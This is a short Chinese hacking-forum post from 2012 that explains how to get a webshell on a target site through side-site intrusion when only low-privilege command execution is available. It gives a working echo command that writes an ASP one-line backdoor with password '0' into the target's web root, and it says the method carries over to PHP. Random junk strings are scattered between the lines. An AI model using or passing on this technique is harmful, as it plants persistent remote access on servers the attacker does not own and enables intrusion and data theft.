找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1884|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 M& j; r. h) q2 ]) h0 x' B7 h+ e# g3 m3 s
命令格式1 m) @  H" D# a+ @5 {2 Y1 S

7 J; k7 `# w- g, l6 M2 g3 o! g& dEcho 语句 >目标站绝对目录1 o8 p% a" J) R& b
6 d& |  l# t5 O( }
例如:
1 B. F) i6 P3 Q: Y5 x2 r
/ h3 E' y. v" p8 o6 n; Q# {echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp  ~+ @) a/ d: [6 l: k

/ E$ i3 @% Q& C这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
) l: r, Q3 U$ ~9 u$ Y  X* a2 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表